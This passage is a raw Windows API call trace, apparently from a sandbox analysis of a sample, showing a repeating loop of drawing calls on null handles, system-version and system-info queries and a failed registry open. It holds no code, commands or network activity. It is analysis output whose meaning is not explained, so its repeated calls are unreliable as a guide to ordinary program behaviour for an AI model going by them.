hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.333] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.333] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.333] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.333] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x190401dc [0091.333] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1b0401d9 [0091.333] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b34 [0091.333] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b35 [0091.333] CombineRgn (hrgnDst=0x1045b34, hrgnSrc1=0x190401dc, hrgnSrc2=0x1b0401d9, iMode=1) returned 1 [0091.333] CombineRgn (hrgnDst=0x1045b35, hrgnSrc1=0x190401dc, hrgnSrc2=0x1b0401d9, iMode=4) returned 2 [0091.333] CreateSolidBrush (color=0xff) returned 0x2105b33 [0091.333] CreateSolidBrush (color=0xff0000) returned 0x1105b36 [0091.333] DeleteObject (ho=0x1105b36) returned 1 [0091.333] DeleteObject (ho=0x1b0401d9) returned 1 [0091.333] DeleteObject (ho=0x190401dc) returned 1 [0091.333] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.333] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.333] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.333] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.333] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.333] BeginPath (hdc=0x0) returned 0 [0091.333] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.333] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.333] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.333] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.333] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.333] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.333] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.333] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.334] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1c0401d9 [0091.334] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1a0401dc [0091.334] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b37 [0091.334] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b38 [0091.334] CombineRgn (hrgnDst=0x1045b37, hrgnSrc1=0x1c0401d9, hrgnSrc2=0x1a0401dc, iMode=1) returned 1 [0091.334] CombineRgn (hrgnDst=0x1045b38, hrgnSrc1=0x1c0401d9, hrgnSrc2=0x1a0401dc, iMode=4) returned 2 [0091.334] CreateSolidBrush (color=0xff) returned 0x2105b36 [0091.334] CreateSolidBrush (color=0xff0000) returned 0x1105b39 [0091.334] DeleteObject (ho=0x1105b39) returned 1 [0091.334] DeleteObject (ho=0x1a0401dc) returned 1 [0091.334] DeleteObject (ho=0x1c0401d9) returned 1 [0091.334] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.334] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.334] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.334] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.334] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.334] BeginPath (hdc=0x0) returned 0 [0091.334] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.334] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.334] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.334] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.334] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.334] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.334] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.334] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.334] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1b0401dc [0091.334] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1d0401d9 [0091.334] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b3a [0091.334] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b3b [0091.334] CombineRgn (hrgnDst=0x1045b3a, hrgnSrc1=0x1b0401dc, hrgnSrc2=0x1d0401d9, iMode=1) returned 1 [0091.335] CombineRgn (hrgnDst=0x1045b3b, hrgnSrc1=0x1b0401dc, hrgnSrc2=0x1d0401d9, iMode=4) returned 2 [0091.335] CreateSolidBrush (color=0xff) returned 0x2105b39 [0091.335] CreateSolidBrush (color=0xff0000) returned 0x1105b3c [0091.335] DeleteObject (ho=0x1105b3c) returned 1 [0091.335] DeleteObject (ho=0x1d0401d9) returned 1 [0091.335] DeleteObject (ho=0x1b0401dc) returned 1 [0091.335] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.335] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.335] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.335] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.335] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.335] BeginPath (hdc=0x0) returned 0 [0091.335] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.335] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.335] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.335] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.335] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.335] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.335] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.335] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.335] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1e0401d9 [0091.335] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1c0401dc [0091.335] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b3d [0091.335] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b3e [0091.335] CombineRgn (hrgnDst=0x1045b3d, hrgnSrc1=0x1e0401d9, hrgnSrc2=0x1c0401dc, iMode=1) returned 1 [0091.335] CombineRgn (hrgnDst=0x1045b3e, hrgnSrc1=0x1e0401d9, hrgnSrc2=0x1c0401dc, iMode=4) returned 2 [0091.335] CreateSolidBrush (color=0xff) returned 0x2105b3c [0091.335] CreateSolidBrush (color=0xff0000) returned 0x1105b3f [0091.335] DeleteObject (ho=0x1105b3f) returned 1 [0091.335] DeleteObject (ho=0x1c0401dc) returned 1 [0091.335] DeleteObject (ho=0x1e0401d9) returned 1 [0091.336] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.336] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.336] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.336] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.336] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.336] BeginPath (hdc=0x0) returned 0 [0091.336] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.336] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.336] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.336] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.336] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.336] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.336] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.336] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.336] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1d0401dc [0091.336] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1f0401d9 [0091.336] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b40 [0091.336] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b41 [0091.336] CombineRgn (hrgnDst=0x1045b40, hrgnSrc1=0x1d0401dc, hrgnSrc2=0x1f0401d9, iMode=1) returned 1 [0091.336] CombineRgn (hrgnDst=0x1045b41, hrgnSrc1=0x1d0401dc, hrgnSrc2=0x1f0401d9, iMode=4) returned 2 [0091.336] CreateSolidBrush (color=0xff) returned 0x2105b3f [0091.336] CreateSolidBrush (color=0xff0000) returned 0x1105b42 [0091.336] DeleteObject (ho=0x1105b42) returned 1 [0091.336] DeleteObject (ho=0x1f0401d9) returned 1 [0091.336] DeleteObject (ho=0x1d0401dc) returned 1 [0091.336] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.336] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.336] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.336] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.336] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.336] BeginPath (hdc=0x0) returned 0 [0091.336] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.336] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.336] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.337] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.337] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.337] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.337] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.337] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.337] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x200401d9 [0091.337] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1e0401dc [0091.337] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b43 [0091.337] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b44 [0091.337] CombineRgn (hrgnDst=0x1045b43, hrgnSrc1=0x200401d9, hrgnSrc2=0x1e0401dc, iMode=1) returned 1 [0091.337] CombineRgn (hrgnDst=0x1045b44, hrgnSrc1=0x200401d9, hrgnSrc2=0x1e0401dc, iMode=4) returned 2 [0091.337] CreateSolidBrush (color=0xff) returned 0x2105b42 [0091.337] CreateSolidBrush (color=0xff0000) returned 0x1105b45 [0091.337] DeleteObject (ho=0x1105b45) returned 1 [0091.337] DeleteObject (ho=0x1e0401dc) returned 1 [0091.337] DeleteObject (ho=0x200401d9) returned 1 [0091.337] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.337] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.337] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.337] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.337] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.337] BeginPath (hdc=0x0) returned 0 [0091.337] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.337] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.337] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.337] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.337] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.337] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.337] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.337] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.432] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1f0401dc [0091.432] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x210401d9 [0091.432] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x2045b47 [0091.432] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x2045b48 [0091.432] CombineRgn (hrgnDst=0x2045b47, hrgnSrc1=0x1f0401dc, hrgnSrc2=0x210401d9, iMode=1) returned 1 [0091.432] CombineRgn (hrgnDst=0x2045b48, hrgnSrc1=0x1f0401dc, hrgnSrc2=0x210401d9, iMode=4) returned 2 [0091.432] CreateSolidBrush (color=0xff) returned 0x2105b45 [0091.432] CreateSolidBrush (color=0xff0000) returned 0x2105b46 [0091.432] DeleteObject (ho=0x2105b46) returned 1 [0091.432] DeleteObject (ho=0x210401d9) returned 1 [0091.432] DeleteObject (ho=0x1f0401dc) returned 1 [0091.432] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.432] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.432] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.432] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.432] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.432] BeginPath (hdc=0x0) returned 0 [0091.432] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.432] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.432] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.432] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.433] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.433] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.433] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.433] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.433] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x220401d9 [0091.433] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x200401dc [0091.433] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b49 [0091.433] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b4a [0091.433] CombineRgn (hrgnDst=0x1045b49, hrgnSrc1=0x220401d9, hrgnSrc2=0x200401dc, iMode=1) returned 1 [0091.433] CombineRgn (hrgnDst=0x1045b4a, hrgnSrc1=0x220401d9, hrgnSrc2=0x200401dc, iMode=4) returned 2 [0091.433] CreateSolidBrush (color=0xff) returned 0x3105b46 [0091.433] CreateSolidBrush (color=0xff0000) returned 0x1105b4b [0091.433] DeleteObject (ho=0x1105b4b) returned 1 [0091.433] DeleteObject (ho=0x200401dc) returned 1 [0091.433] DeleteObject (ho=0x220401d9) returned 1 [0091.433] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.433] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.433] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.433] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.433] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.433] BeginPath (hdc=0x0) returned 0 [0091.433] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.433] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.433] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.433] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.433] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.433] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.433] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.433] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.434] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x210401dc [0091.434] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x230401d9 [0091.434] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b4c [0091.434] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b4d [0091.434] CombineRgn (hrgnDst=0x1045b4c, hrgnSrc1=0x210401dc, hrgnSrc2=0x230401d9, iMode=1) returned 1 [0091.434] CombineRgn (hrgnDst=0x1045b4d, hrgnSrc1=0x210401dc, hrgnSrc2=0x230401d9, iMode=4) returned 2 [0091.434] CreateSolidBrush (color=0xff) returned 0x2105b4b [0091.434] CreateSolidBrush (color=0xff0000) returned 0x1105b4e [0091.434] DeleteObject (ho=0x1105b4e) returned 1 [0091.434] DeleteObject (ho=0x230401d9) returned 1 [0091.434] DeleteObject (ho=0x210401dc) returned 1 [0091.434] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.434] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.434] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.434] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.434] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.434] BeginPath (hdc=0x0) returned 0 [0091.434] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.434] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.434] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.434] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.434] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.434] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.434] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.434] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.434] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x240401d9 [0091.434] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x220401dc [0091.434] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b4f [0091.434] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045b50 [0091.434] CombineRgn (hrgnDst=0x1045b4f, hrgnSrc1=0x240401d9, hrgnSrc2=0x220401dc, iMode=1) returned 1 [0091.434] 